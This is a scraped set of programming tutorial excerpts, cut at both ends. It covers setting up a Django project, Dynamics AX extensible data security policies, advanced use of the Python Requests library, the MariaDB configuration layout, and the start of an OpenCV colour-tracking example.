methods, use CLS or the objects for initialization. Method names and instance variables: Use the function naming rules—lowercase with words separated by underscores as necessary to improve readability. Use one leading underscore only for non-public methods and instance variables. Using IDE for faster development There are many options on the market when it comes to source code editors. Some people prefer full-fledged IDEs, whereas others like simple text editors. The choice is totally yours; pick up whatever feels more comfortable. If you already use a certain program to work with Python source files, I suggest that you stick to it as it will work just fine with Django. Otherwise, I can make a couple of recommendations, such as these: SublimeText: This editor is lightweight and very powerful. It is available for all major platforms, supports syntax highlighting and code completion, and works well with Python. The editor is open source and you can find it at http://www.sublimetext.com/ PyCharm: This, I would say, is most intelligent code editor of all and has advanced features, such as code refactoring and code analysis, which makes development cleaner. Features for Django include template debugging (which is a winner) and also quick documentation, so this look-up is a must for beginners. The community edition is free and you can sample a 30-day trial version before buying the professional edition. Setting up your project with the Sublime text editor Most of the examples that we will show you in this book will be written using Sublime text editor. In this section, we will show how to install and set up the Django project. Download and installation: You can download Sublime from the download tab of the site www.sublimetext.com. Click on the downloaded file option to install. Setting up for Django: Sublime has a very extensive plug-in ecosystem, which means that once you have downloaded the editor, you can install plug-ins for adding more features to it. After successful installation, it will look like this: Most important of all is Package Control, which is the manager for installing additional plugins directly from within Sublime. This will be your only manual installation of the package. It will take care of the rest of the package installation ahead. Some of the recommendations for Python development using Sublime are as follows: Sublime Linter: This gives instant feedback about the Python code as you write it. It also has PEP8 support; this plugin will highlight in real time the things we discussed about better coding in the previous section so that you can fix them. Sublime CodeIntel: This is maintained by the developer of SublimeLint. Sublime CodeIntel have some of advanced functionalities, such as directly go-to definition, intelligent code completion, and import suggestions. You can also explore other plugins for Sublime to increase your productivity. Setting up the pycharm IDE You can use any of your favorite IDEs for Django project development. We will use pycharm IDE for this book. This IDE is recommended as it will help you at the time of debugging, using breakpoints that will save you a lot of time figuring out what actually went wrong. Here is how to install and set up pycharm IDE for Django: Download and installation: You can check the features and download the pycharm IDE from the following link: http://www.jetbrains.com/pycharm/ Setting up for Django: Setting up pycharm for Django is very easy. You just have to import the project folder and give the manage.py path, as shown in the following figure: The Django project structure The Django project structure has been changed in the 1.6 release version. Django (django-admin.py) also has a startapp command to create an application, so it is high time to tell you the difference between an application and a project in Django. A project is a complete website or application, whereas an application is a small, self-contained Django application. An application is based on the principle that it should do one thing and do it right. To ease out the pain of building a Django project right from scratch, Django gives you an advantage by auto-generating the basic project structure files from which any project can be taken forward for its development and feature addition. Thus, to conclude, we can say that a project is a collection of applications, and an application can be written as a separate entity and can be easily exported to other applications for reusability. To create your first Django project, open a terminal (or Command Prompt for Windows users), type the following command, and hit Enter: $ django-admin.py startproject django_mytweets This command will make a folder named django_mytweets in the current directory and create the initial directory structure inside it. Let's see what kind of files are created. The new structure is as follows: django_mytweets/// django_mytweets/ manage.py This is the content of django_mytweets/: django_mytweets/ __init__.py settings.py urls.py wsgi.py Here is a quick explanation of what these files are: django_mytweets (the outer folder): This folder is the project folder. Contrary to the earlier project structure in which the whole project was kept in a single folder, the new Django project structure somehow hints that every project is an application inside Django. This means that you can import other third party applications on the same level as the Django project. This folder also contains the manage.py file, which include all the project management settings. manage.py: This is utility script is used to manage our project. You can think of it as your project's version of django-admin.py. Actually, both django-admin.py and manage.py share the same backend code. Further clarification about the settings will be provided when are going to tweak the changes. Let's have a look at the manage.py file: #!/usr/bin/env python import os import sys if __name__ == "__main__": os.environ.setdefault("DJANGO_SETTINGS_MODULE", "django_mytweets.settings") from django.core.management import execute_from_command_line execute_from_command_line(sys.argv) The source code of the manage.py file will be self-explanatory once you read the following code explanation. #!/usr/bin/env python The first line is just the declaration that the following file is a Python file, followed by the import section in which os and sys modules are imported. These modules mainly contain system-related operations. import os import sys The next piece of code checks whether the file is executed by the main function, which is the first function to be executed, and then loads the Django setting module to the current path. As you are already running a virtual environment, this will set the path for all the modules to the path of the current running virtual environment. if __name__ == "__main__": os.environ.setdefault("DJANGO_SETTINGS_MODULE", "django_mytweets.settings") django_mytweets/ ( Inner folder) __init__.py Django projects are Python packages, and this file is required to tell Python that this folder is to be treated as a package. A package in Python's terminology is a collection of modules, and they are used to group similar files together and prevent naming conflicts. settings.py: This is the main configuration file for your Django project. In it, you can specify a variety of options, including database settings, site language(s), what Django features need to be enabled, and so on. By default, the database is configured to use SQLite Database, which is advisable to use for testing purposes. Here, we will only see how to enter the database in the settings file; it also contains the basic setting configuration, and with slight modification in the manage.py file, it can be moved to another folder, such as config or conf. To make every other third-party application a part of the project, we need to register it in the settings.py file. INSTALLED_APPS is a variable that contains all the entries about the installed application. As the project grows, it becomes difficult to manage; therefore, there are three logical partitions for the INSTALLED_APPS variable, as follows: DEFAULT_APPS: This parameter contains the default Django installed applications (such as the admin) THIRD_PARTY_APPS: This parameter contains other application like SocialAuth used for social authentication LOCAL_APPS: This parameter contains the applications that are created by you url.py: This is another configuration file. You can think of it as a mapping between URLs and the Django view functions that handle them. This file is one of Django's more powerful features. When we start writing code for our application, we will create new files inside the project's folder. So, the folder also serves as a container for our code. Now that you have a general idea of the structure of a Django project, let's configure our database system. Summary We prepared our development environment in this article, created our first project, set up the database, and learned how to launch the Django development server. We learned the best way to write code for our Django project and saw the default Django project structure. Resources for Article: Further resources on this subject: Tinkering Around in Django JavaScript Integration [article] Adding a developer with Django forms [article] So, what is Django? [article]

0
0
8916

How-To Tutorials

article-image-developing-extensible-data-security

Packt

17 Jun 2015

7 min read

Developing Extensible Data Security

Packt

17 Jun 2015

7 min read

This article is written by Ahmed Mohamed Rafik Moustafa, the author of Microsoft Dynamics AX 2012 R3 Security. In any corporation, some users are restricted to work with specific sensitive data because of its confidentiality or company policies, and this type of data access authorization can be managed using extensible data security (XDS). XDS is the evolution of the record-level security (RLS) that was available in the previous versions of Microsoft Dynamics AX. Also, Microsoft keeps the RLS in version AX 2012, so you can refer to it at any time. The topics that will be covered in this article are as follows: The main concepts of XDS policies Designing and developing the XDS policy Creating the XDS policy Adding constrained tables and views Setting the XDS policy context Debugging the XDS policy (For more resources related to this topic, see here.) The main concepts of XDS policies When developing an XDS policy, you need to be familiar with the following concepts: Concept Description Constrained tables A constrained table is the table or tables in a given security policy from which data is filtered or secured, based on the associated policy query. Primary tables A primary table is used to secure the content of the related constrained table. Policy queries A policy query is used to secure the constrained tables specified in a given extensible data security policy. Policy context A policy context is a piece of information that controls the circumstances under which a given policy is considered to be applicable. If this context is not set, then the policy, even if enabled, is not enforced. After understanding the previous concepts of XDS, we move on to the four steps to develop an XDS policy, and they are as follows: Design the query on the primary tables. Develop the policy. Add the constrained tables and views. Set up the policy context. Designing and developing the XDS policy XDS is a powerful mechanism that allows us to express and implement data security needs. The following steps show detailed instructions on designing and developing XDS: Determine the primary table; for example, VendTable. Create a query under the AOT Queries node: Use VendTable as the first data source Add other data sources as required by the vendor data model: Creating the policy Now we have to create the policy itself. Follow these steps: Right-click on AOT and go to Security | Policies. Select New Security Policy. Adjust the PrimaryTable property on the policy to VendTable. Settle the Query property on the policy to VendProfileAccountPolicy. Adjust the PolicyGroup property to Vendor Self Service. Settle the ConstrainedTable property to Yes to secure the primary table using this policy. Adjust the Enabled property to Yes or No, depending on whether or not you want to control the policy. Settle the ContextType property to one of the following: ContextString: Adjust the property to this value if a global context is to be used with the policy. After using ContextString, it needs to be set by the application using the XDS::SetContext API. RoleName: Adjust the property to this value if the policy should be applied only if a user in a specific role needs to access the constrained tables. RoleProperty: Adjust the property to this value if the policy is to be applied only if the user is a member of any one of roles that have the ContextString property settled to the same value. The following screenshot displays the properties: Adding constrained tables and views After designing the query and developing the required policy, the next step is to add the constrained tables and views that contain the data by using the created policy. By following the next steps, you will be able to add constrained tables or views: Right-click on the Constrained Tables node. Go to New | Add table to add a constrained table; for example, the AssetBook table, as shown in the following screenshot: When adding the constrained table AssetBook, you must determine the relationship that should be used to join the primary table with the last constrained table. Go to New | Add View to add a constrained view to the selected policy. Repeat these steps for every constrained table or view that needs to be secured through this policy. After finishing these steps, the policy will be applied for all users who are attempting to access the tables or views that are located on the constrained table's node when the Enabled property is set to Yes. Security policies are not applied to system administrators who are in the SysAdmin role. Setting the XDS policy context According to the requirements, the security policy needs to be adjusted to apply only to the users who were assigned to the vendor role. The following steps should be performed to make the appropriate adjustment: Adjust the ContextType property on the policy node to RoleProperty. Settle the ContextString property on the policy node to ForAllVendorRoles: To assign this policy to all the vendor roles, the ForAllVendorRoles context should be applied to the appropriate roles: Locate each role that needs to be assigned to this policy on the AOT node; for example, the VendVendor role. Adjust the ContextString property on the VendVendor role to ForAllVendorRoles: For more information, go to MSDN and refer to Whitepapers – Developing Extensible Data Security Policies at https://msdn.microsoft.com/en-us/library/bb629286.aspx. Debugging XDS policies One of the most common issues reported when a new XDS policy is deployed is that an unexpected number of rows are being returned from a given constrained table. For example, more sales orders are being returned than expected if the sales order table is being constrained by a given customer group. XDS provides a method to debug these errors. We will go over it now. Review the SQL queries that have been generated. The X++ select has been extended with a command that instructs the underlying data access framework to generate the SQL query without actually executing it. The following job runs a select query on SalesTable with a generated command. It then calls the getSQLStatement() method on SalesTable and dumps the output using the info API. static void VerifySalesQuery(Args _args) { SalesTable salesTable; XDSServices xdsServices = new XDSServices(); xdsServices.setXDSContext(1, ''); //Only generate SQL statement for custGroup table select generateonly forceLiterals CustAccount, DeliveryDate from salesTable; //Print SQL statement to infolog info(salesTable.getSQLStatement()); xdsServices.setXDSContext(2, ''); } The XDS policy development framework further eases this process of doing some advanced debugging by storing the query in a human-readable form. This query and others on a given constrained table in a policy can be retrieved by using the following Transact-SQL query on the database in the development environment (AXDBDEV in this example): SELECT [PRIMARYTABLEAOTNAME], [QUERYOBJECTAOTNAME], [CONSTRAINEDTABLE], [MODELEDQUERYDEBUGINFO], [CONTEXTTYPE],[CONTEXTSTRING], [ISENABLED], [ISMODELED] FROM [AXDBDEV].[dbo].[ModelSecPolRuntimeEx] This SQL query generates the following output: As you can see, the query that will join the WHERE statement of any query to the AssetBook table will be ready for debugging. Other metadata, such as LayerId, can be debugged if needed. When multiple policies apply to a table, the results of the policies are linked together with AND operators. Summary By the end of this article, you are able to secure your sensitive data using the XDS features. We learned how to design and develop XDS policies, constrained tables and views, primary tables, policy queries, set the security context, run SQL queries and learned how to debug XDS policies. Resources for Article: Further resources on this subject: Understanding and Creating Simple SSRS Reports [article] Working with Data in Forms [article] Learning MS Dynamics AX 2012 Programming [article]

0
0
3644

How-To Tutorials

Packt

16 Jun 2015

14 min read

Defining Dependencies

Packt

16 Jun 2015

14 min read

0
0
1800

Packt

16 Jun 2015

17 min read

Digging Deep into Requests

Packt

16 Jun 2015

17 min read

In this article by Rakesh Vidya Chandra and Bala Subrahmanyam Varanasi, authors of the book Python Requests Essentials, we are going to deal with advanced topics in the Requests module. There are many more features in the Requests module that makes the interaction with the web a cakewalk. Let us get to know more about different ways to use Requests module which helps us to understand the ease of using it. (For more resources related to this topic, see here.) In a nutshell, we will cover the following topics: Persisting parameters across requests using Session objects Revealing the structure of request and response Using prepared requests Verifying SSL certificate with Requests Body Content Workflow Using generator for sending chunk encoded requests Getting the request method arguments with event hooks Iterating over streaming API Self-describing the APIs with link headers Transport Adapter Persisting parameters across Requests using Session objects The Requests module contains a session object, which has the capability to persist settings across the requests. Using this session object, we can persist cookies, we can create prepared requests, we can use the keep-alive feature and do many more things. The Session object contains all the methods of Requests API such as GET, POST, PUT, DELETE and so on. Before using all the capabilities of the Session object, let us get to know how to use sessions and persist cookies across requests. Let us use the session method to get the resource. >>> import requests >>> session = requests.Session() >>> response = requests.get("https://google.co.in", cookies={"new-cookie-identifier": "1234abcd"}) In the preceding example, we created a session object with requests and its get method is used to access a web resource. The cookie value which we had set in the previous example will be accessible using response.request.headers. >>> response.request.headers CaseInsensitiveDict({'Cookie': 'new-cookie-identifier=1234abcd', 'Accept-Encoding': 'gzip, deflate, compress', 'Accept': '*/*', 'User-Agent': 'python-requests/2.2.1 CPython/2.7.5+ Linux/3.13.0-43-generic'}) >>> response.request.headers['Cookie'] 'new-cookie-identifier=1234abcd' With session object, we can specify some default values of the properties, which needs to be sent to the server using GET, POST, PUT and so on. We can achieve this by specifying the values to the properties like headers, auth and so on, on a Session object. >>> session.params = {"key1": "value", "key2": "value2"} >>> session.auth = ('username', 'password') >>> session.headers.update({'foo': 'bar'}) In the preceding example, we have set some default values to the properties—params, auth, and headers using the session object. We can override them in the subsequent request, as shown in the following example, if we want to: >>> session.get('http://mysite.com/new/url', headers={'foo': 'new-bar'}) Revealing the structure of request and response A Requests object is the one which is created by the user when he/she tries to interact with a web resource. It will be sent as a prepared request to the server and does contain some parameters which are optional. Let us have an eagle eye view on the parameters: Method: This is the HTTP method to be used to interact with the web service. For example: GET, POST, PUT. URL: The web address to which the request needs to be sent. headers: A dictionary of headers to be sent in the request. files: This can be used while dealing with the multipart upload. It's the dictionary of files, with key as file name and value as file object. data: This is the body to be attached to the request.json. There are two cases that come in to the picture here: If json is provided, content-type in the header is changed to application/json and at this point, json acts as a body to the request. In the second case, if both json and data are provided together, data is silently ignored. params: A dictionary of URL parameters to append to the URL. auth: This is used when we need to specify the authentication to the request. It's a tuple containing username and password. cookies: A dictionary or a cookie jar of cookies which can be added to the request. hooks: A dictionary of callback hooks. A Response object contains the response of the server to a HTTP request. It is generated once Requests gets a response back from the server. It contains all of the information returned by the server and also stores the Request object we created originally. Whenever we make a call to a server using the requests, two major transactions are taking place in this context which are listed as follows: We are constructing a Request object which will be sent out to the server to request a resource A Response object is generated by the requests module Now, let us look at an example of getting a resource from Python's official site. >>> response = requests.get('https://python.org') In the preceding line of code, a requests object gets constructed and will be sent to 'https://python.org'. Thus obtained Requests object will be stored in the response.request variable. We can access the headers of the Request object which was sent off to the server in the following way: >>> response.request.headers CaseInsensitiveDict({'Accept-Encoding': 'gzip, deflate, compress', 'Accept': '*/*', 'User-Agent': 'python-requests/2.2.1 CPython/2.7.5+ Linux/3.13.0-43-generic'}) The headers returned by the server can be accessed with its 'headers' attribute as shown in the following example: >>> response.headers CaseInsensitiveDict({'content-length': '45950', 'via': '1.1 varnish', 'x-cache': 'HIT', 'accept-ranges': 'bytes', 'strict-transport-security': 'max-age=63072000; includeSubDomains', 'vary': 'Cookie', 'server': 'nginx', 'age': '557','content-type': 'text/html; charset=utf-8', 'public-key-pins': 'max-age=600; includeSubDomains; ..) The response object contains different attributes like _content, status_code, headers, url, history, encoding, reason, cookies, elapsed, request. >>> response.status_code 200 >>> response.url u'https://www.python.org/' >>> response.elapsed datetime.timedelta(0, 1, 904954) >>> response.reason 'OK' Using prepared Requests Every request we send to the server turns to be a PreparedRequest by default. The request attribute of the Response object which is received from an API call or a session call is actually the PreparedRequest that was used. There might be cases in which we ought to send a request which would incur an extra step of adding a different parameter. Parameters can be cookies, files, auth, timeout and so on. We can handle this extra step efficiently by using the combination of sessions and prepared requests. Let us look at an example: >>> from requests import Request, Session >>> header = {} >>> request = Request('get', 'some_url', headers=header) We are trying to send a get request with a header in the previous example. Now, take an instance where we are planning to send the request with the same method, URL, and headers, but we want to add some more parameters to it. In this condition, we can use the session method to receive complete session level state to access the parameters of the initial sent request. This can be done by using the session object. >>> from requests import Request, Session >>> session = Session() >>> request1 = Request('GET', 'some_url', headers=header) Now, let us prepare a request using the session object to get the values of the session level state: >>> prepare = session.prepare_request(request1) We can send the request object request with more parameters now, as follows: >>> response = session.send(prepare, stream=True, verify=True) 200 Voila! Huge time saving! The prepare method prepares the complete request with the supplied parameters. In the previous example, the prepare_request method was used. There are also some other methods like prepare_auth, prepare_body, prepare_cookies, prepare_headers, prepare_hooks, prepare_method, prepare_url which are used to create individual properties. Verifying an SSL certificate with Requests Requests provides the facility to verify an SSL certificate for HTTPS requests. We can use the verify argument to check whether the host's SSL certificate is verified or not. Let us consider a website which has got no SSL certificate. We shall send a GET request with the argument verify to it. The syntax to send the request is as follows: requests.get('no ssl certificate site', verify=True) As the website doesn't have an SSL certificate, it will result an error similar to the following: requests.exceptions.ConnectionError: ('Connection aborted.', error(111, 'Connection refused')) Let us verify the SSL certificate for a website which is certified. Consider the following example: >>> requests.get('https://python.org', verify=True) <Response [200]> In the preceding example, the result was 200, as the mentioned website is SSL certified one. If we do not want to verify the SSL certificate with a request, then we can put the argument verify=False. By default, the value of verify will turn to True. Body content workflow Take an instance where a continuous stream of data is being downloaded when we make a request. In this situation, the client has to listen to the server continuously until it receives the complete data. Consider the case of accessing the content from the response first and the worry about the body next. In the above two situations, we can use the parameter stream. Let us look at an example: >>> requests.get("https://pypi.python.org/packages/source/F/Flask/Flask-0.10.1.tar.gz", stream=True) If we make a request with the parameter stream=True, the connection remains open and only the headers of the response will be downloaded. This gives us the capability to fetch the content whenever we need by specifying the conditions like the number of bytes of data. The syntax is as follows: if int(request.headers['content_length']) < TOO_LONG: content = r.content By setting the parameter stream=True and by accessing the response as a file-like object that is response.raw, if we use the method iter_content, we can iterate over response.data. This will avoid reading of larger responses at once. The syntax is as follows: iter_content(chunk_size=size in bytes, decode_unicode=False) In the same way, we can iterate through the content using iter_lines method which will iterate over the response data one line at a time. The syntax is as follows: iter_lines(chunk_size = size in bytes, decode_unicode=None, delimitter=None) The important thing that should be noted while using the stream parameter is it doesn't release the connection when it is set as True, unless all the data is consumed or response.close is executed. Keep-alive facility As the urllib3 supports the reuse of the same socket connection for multiple requests, we can send many requests with one socket and receive the responses using the keep-alive feature in the Requests library. Within a session, it turns to be automatic. Every request made within a session automatically uses the appropriate connection by default. The connection that is being used will be released after all the data from the body is read. Streaming uploads A file-like object which is of massive size can be streamed and uploaded using the Requests library. All we need to do is to supply the contents of the stream as a value to the data attribute in the request call as shown in the following lines. The syntax is as follows: with open('massive-body', 'rb') as file: requests.post('http://example.com/some/stream/url', data=file) Using generator for sending chunk encoded Requests Chunked transfer encoding is a mechanism for transferring data in an HTTP request. With this mechanism, the data is sent in a series of chunks. Requests supports chunked transfer encoding, for both outgoing and incoming requests. In order to send a chunk encoded request, we need to supply a generator for your body. The usage is shown in the following example: >>> def generator(): ... yield "Hello " ... yield "World!" ... >>> requests.post('http://example.com/some/chunked/url/path', data=generator()) Getting the request method arguments with event hooks We can alter the portions of the request process signal event handling using hooks. For example, there is hook named response which contains the response generated from a request. It is a dictionary which can be passed as a parameter to the request. The syntax is as follows: hooks = {hook_name: callback_function, … } The callback_function parameter may or may not return a value. When it returns a value, it is assumed that it is to replace the data that was passed in. If the callback function doesn't return any value, there won't be any effect on the data. Here is an example of a callback function: >>> def print_attributes(request, *args, **kwargs): ... print(request.url) ... print(request .status_code) ... print(request .headers) If there is an error in the execution of callback_function, you'll receive a warning message in the standard output. Now let us print some of the attributes of the request, using the preceding callback_function: >>> requests.get('https://www.python.org/', hooks=dict(response=print_attributes)) https://www.python.org/ 200 CaseInsensitiveDict({'content-type': 'text/html; ...}) <Response [200]> Iterating over streaming API Streaming API tends to keep the request open allowing us to collect the stream data in real time. While dealing with a continuous stream of data, to ensure that none of the messages being missed from it we can take the help of iter_lines() in Requests. The iter_lines() iterates over the response data line by line. This can be achieved by setting the parameter stream as True while sending the request. It's better to keep in mind that it's not always safe to call the iter_lines() function as it may result in loss of received data. Consider the following example taken from http://docs.python-requests.org/en/latest/user/advanced/#streaming-requests: >>> import json >>> import requests >>> r = requests.get('http://httpbin.org/stream/4', stream=True) >>> for line in r.iter_lines(): ... if line: ... print(json.loads(line) ) In the preceding example, the response contains a stream of data. With the help of iter_lines(), we tried to print the data by iterating through every line. Encodings As specified in the HTTP protocol (RFC 7230), applications can request the server to return the HTTP responses in an encoded format. The process of encoding turns the response content into an understandable format which makes it easy to access it. When the HTTP header fails to return the type of encoding, Requests will try to assume the encoding with the help of chardet. If we access the response headers of a request, it does contain the keys of content-type. Let us look at a response header's content-type: >>> re = requests.get('http://google.com') >>> re.headers['content-type'] 'text/html; charset=ISO-8859-1' In the preceding example the content type contains 'text/html; charset=ISO-8859-1'. This happens when the Requests finds the charset value to be None and the 'content-type' value to be 'Text'. It follows the protocol RFC 7230 to change the value of charset to ISO-8859-1 in this type of a situation. In case we are dealing with different types of encodings like 'utf-8', we can explicitly specify the encoding by setting the property to Response.encoding. HTTP verbs Requests support the usage of the full range of HTTP verbs which are defined in the following table. To most of the supported verbs, 'url' is the only argument that must be passed while using them. Method Description GET GET method requests a representation of the specified resource. Apart from retrieving the data, there will be no other effect of using this method. Definition is given as requests.get(url, **kwargs) POST The POST verb is used for the creation of new resources. The submitted data will be handled by the server to a specified resource. Definition is given as requests.post(url, data=None, json=None, **kwargs) PUT This method uploads a representation of the specified URI. If the URI is not pointing to any resource, the server can create a new object with the given data or it will modify the existing resource. Definition is given as requests.put(url, data=None, **kwargs) DELETE This is pretty easy to understand. It is used to delete the specified resource. Definition is given as requests.delete(url, **kwargs) HEAD This verb is useful for retrieving meta-information written in response headers without having to fetch the response body. Definition is given as requests.head(url, **kwargs) OPTIONS OPTIONS is a HTTP method which returns the HTTP methods that the server supports for a specified URL. Definition is given as requests.options(url, **kwargs) PATCH This method is used to apply partial modifications to a resource. Definition is given as requests.patch(url, data=None, **kwargs) Self-describing the APIs with link headers Take a case of accessing a resource in which the information is accommodated in different pages. If we need to approach the next page of the resource, we can make use of the link headers. The link headers contain the meta data of the requested resource, that is the next page information in our case. >>> url = "https://api.github.com/search/code?q=addClass+user:mozilla&page=1&per_page=4" >>> response = requests.head(url=url) >>> response.headers['link'] '<https://api.github.com/search/code?q=addClass+user%3Amozilla&page=2&per_page=4>; rel="next", <https://api.github.com/search/code?q=addClass+user%3Amozilla&page=250&per_page=4>; rel="last" In the preceding example, we have specified in the URL that we want to access page number one and it should contain four records. The Requests automatically parses the link headers and updates the information about the next page. When we try to access the link header, it showed the output with the values of the page and the number of records per page. Transport Adapter It is used to provide an interface for Requests sessions to connect with HTTP and HTTPS. This will help us to mimic the web service to fit our needs. With the help of Transport Adapters, we can configure the request according to the HTTP service we opt to use. Requests contains a Transport Adapter called HTTPAdapter included in it. Consider the following example: >>> session = requests.Session() >>> adapter = requests.adapters.HTTPAdapter(max_retries=6) >>> session.mount("http://google.co.in", adapter) In this example, we created a request session in which every request we make retries only six times, when the connection fails. Summary In this article, we learnt about creating sessions and using the session with different criteria. We also looked deeply into HTTP verbs and using proxies. We learnt about streaming requests, dealing with SSL certificate verifications and streaming responses. We also got to know how to use prepared requests, link headers and chunk encoded requests. Resources for Article: Further resources on this subject: Machine Learning [article] Solving problems – closest good restaurant [article] Installing NumPy, SciPy, matplotlib, and IPython [article]

0
0
7908

How-To Tutorials

Packt

16 Jun 2015

8 min read

Set Up MariaDB

Packt

16 Jun 2015

8 min read

In this article, by Daniel Bartholomew, author of Getting Started with MariaDB - Second Edition, you will learn to set up MariaDB with a generic configuration suitable for general use. This is perfect for giving MariaDB a try but might not be suitable for a production database application under heavy load. There are thousands of ways to tweak the settings to get MariaDB to perform just the way we need it to. Many books have been written on this subject. In this article, we'll cover enough of the basics so that we can comfortably edit the MariaDB configuration files and know our way around. The MariaDB filesystem layout A MariaDB installation is not a single file or even a single directory, so the first stop on our tour is a high-level overview of the filesystem layout. We'll start with Windows and then move on to Linux. The MariaDB filesystem layout on Windows On Windows, MariaDB is installed under a directory named with the following pattern: C:Program FilesMariaDB <major>.<minor> In the preceding command, <major> and <minor> refer to the first and second number in the MariaDB version string. So for MariaDB 10.1, the location would be: C:Program FilesMariaDB 10.1 The only alteration to this location, unless we change it during the installation, is when the 32-bit version of MariaDB is installed on a 64-bit version of Windows. In that case, the default MariaDB directory is at the following location: C:Program Files x86MariaDB <major>.<minor> Under the MariaDB directory on Windows, there are four primary directories: bin, data, lib, and include. There are also several configuration examples and other files under the MariaDB directory and a couple of additional directories (docs and Share), but we won't go into their details here. The bin directory is where the executable files of MariaDB are located. The data directory is where databases are stored; it is also where the primary MariaDB configuration file, my.ini, is stored. The lib directory contains various library and plugin files. Lastly, the include directory contains files that are useful for application developers. We don't generally need to worry about the bin, lib, and include directories; it's enough for us to be aware that they exist and know what they contain. The data directory is where we'll spend most of our time in this article and when using MariaDB. On Linux distributions, MariaDB follows the default filesystem layout. For example, the MariaDB binaries are placed under /usr/bin/, libraries are placed under /usr/lib/, manual pages are placed under /usr/share/man/, and so on. However, there are some key MariaDB-specific directories and file locations that we should know about. Two of them are locations that are the same across most Linux distributions. These locations are the /usr/share/mysql/ and /var/lib/mysql/ directories. The /usr/share/mysql/ directory contains helper scripts that are used during the initial installation of MariaDB, translations (so we can have error and system messages in different languages), and character set information. We don't need to worry about these files and scripts; it's enough to know that this directory exists and contains important files. The /var/lib/mysql/ directory is the default location for our actual database data and the related files such as logs. There is not much need to worry about this directory as MariaDB will handle its contents automatically; for now it's enough to know that it exists. The next directory we should know about is where the MariaDB plugins are stored. Unlike the previous two, the location of this directory varies. On Debian and Ubuntu systems, the directory is at the following location: /usr/lib/mysql/plugin/ In distributions such as Fedora, Red Hat, and CentOS, the location of the plugin directory varies depending on whether our system is 32 bit or 64 bit. If unsure, we can just look in both. The possible locations are: /lib64/mysql/plugin//lib/mysql/plugin/ The basic rule of thumb is that if we don't have a /lib64/ directory, we have the 32-bit version of Fedora, Red Hat, or CentOS installed. As with /usr/share/mysql/, we don't need to worry about the contents of the MariaDB plugin directory. It's enough to know that it exists and contains important files. Also, if in the future we install a new MariaDB plugin, this directory is where it will go. The last directory that we should know about is only found on Debian and the distributions based on Debian such as Ubuntu. Its location is as follows: /etc/mysql/ The /etc/mysql/ directory is where the configuration information for MariaDB is stored; specifically, in the following two locations: /etc/mysql/my.cnf/etc/mysql/conf.d/ Fedora, Red Hat, CentOS, and related systems don't have an /etc/mysql/ directory by default, but they do have a my.cnf file and a directory that serves the same purpose that the /etc/mysql/conf.d/ directory does on Debian and Ubuntu. They are at the following two locations: /etc/my.cnf/etc/my.cnf.d/ The my.cnf files, regardless of location, function the same on all Linux versions and on Windows, where it is often named my.ini. The /etc/my.cnf.d/ and /etc/mysql/conf.d/ directories, as mentioned, serve the same purpose. We'll spend the next section going over these two directories. Modular configuration on Linux The /etc/my.cnf.d/ and /etc/mysql/conf.d/ directories are special locations for the MariaDB configuration files. They are found on the MariaDB releases for Linux such as Debian, Ubuntu, Fedora, Red Hat, and CentOS. We will only have one or the other of them, never both, and regardless of which one we have, their function is the same. The basic idea behind these directories is to allow the package manager (APT or YUM) to be able to install packages for MariaDB, which include additions to MariaDB's configuration without needing to edit or change the main my.cnf configuration file. It's easy to imagine the harm that would be caused if we installed a new plugin package and it overwrote a carefully crafted and tuned configuration file. With these special directories, the package manager can simply add a file to the appropriate directory and be done. When the MariaDB server and the clients and utilities included with MariaDB start up, they first read the main my.cnf file and then any files that they find under the /etc/my.cnf.d/ or /etc/mysql/conf.d/ directories that have the extension .cnf because of a line at the end of the default configuration files. For example, MariaDB includes a plugin called feedback whose sole purpose is to send back anonymous statistical information to the MariaDB developers. They use this information to help guide future development efforts. It is disabled by default but can easily be enabled by adding feedback=on to a [mysqld] group of the MariaDB configuration file (we'll talk about configuration groups in the following section). We could add the required lines to our main my.cnf file or, better yet, we can create a file called feedback.cnf (MariaDB doesn't care what the actual filename is, apart from the .cnf extension) with the following content: [mysqld]feedback=on All we have to do is put our feedback.cnf file in the /etc/my.cnf.d/ or /etc/mysql/conf.d/ directory and when we start or restart the server, the feedback.cnf file will be read and the plugin will be turned on. Doing this for a single plugin on a solitary MariaDB server may seem like too much work, but suppose we have 100 servers, and further assume that since the servers are doing different things, each of them has a slightly different my.cnf configuration file. Without using our small feedback.cnf file to turn on the feedback plugin on all of them, we would have to connect to each server in turn and manually add feedback=on to the [mysqld] group of the file. This would get tiresome and there is also a chance that we might make a mistake with one, or several of the files that we edit, even if we try to automate the editing in some way. Copying a single file to each server that only does one thing (turning on the feedback plugin in our example) is much faster, and much safer. And, if we have an automated deployment system in place, copying the file to every server can be almost instant. Caution! Because the configuration settings in the /etc/my.cnf.d/ or /etc/mysql/conf.d/ directory are read after the settings in the my.cnf file, they can override or change the settings in our main my.cnf file. This can be a good thing if that is what we want and expect. Conversely, it can be a bad thing if we are not expecting that behavior. Summary That's it for our configuration highlights tour! In this article, we've learned where the various bits and pieces of MariaDB are installed and about the different parts that make up a typical MariaDB configuration file. Resources for Article: Building a Web Application with PHP and MariaDB – Introduction to caching Installing MariaDB on Windows and Mac OS X Questions & Answers with MariaDB's Michael "Monty" Widenius- Founder of MySQL AB

0
0
1861

Packt

16 Jun 2015

4 min read

Color and motion finding

Packt

16 Jun 2015

4 min read

In this article by Richard Grimmet, the author of the book, Raspberry Pi Robotics Essentials, we'll look at how to detect the Color and motion of an object. (For more resources related to this topic, see here.) OpenCV and your webcam can also track colored objects. This will be useful if you want your biped to follow a colored object. OpenCV makes this amazingly simple by providing some high-level libraries that can help us with this task. To accomplish this, you'll edit a file to look something like what is shown in the following screenshot: Let's look specifically at the code that makes it possible to isolate the colored ball: hue_img = cv.CvtColor(frame, cv.CV_BGR2HSV): This line creates a new image that stores the image as per the values of hue (color), saturation, and value (HSV), instead of the red, green, and blue (RGB) pixel values of the original image. Converting to HSV focuses our processing more on the color, as opposed to the amount of light hitting it. threshold_img = cv.InRangeS(hue_img, low_range, high_range): The low_range, high_range parameters determine the color range. In this case, it is an orange ball, so you want to detect the color orange. For a good tutorial on using hue to specify color, refer to http://www.tomjewett.com/colors/hsb.html. Also, http://www.shervinemami.info/colorConversion.html includes a program that you can use to determine your values by selecting a specific color. Run the program. If you see a single black image, move this window, and you will expose the original image window as well. Now, take your target (in this case, an orange ping-pong ball) and move it into the frame. You should see something like what is shown in the following screenshot: Notice the white pixels in our threshold image showing where the ball is located. You can add more OpenCV code that gives the actual location of the ball. In our original image file of the ball's location, you can actually draw a rectangle around the ball as an indicator. Edit the file to look as follows: The added lines look like the following: hue_image = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV): This line creates a hue 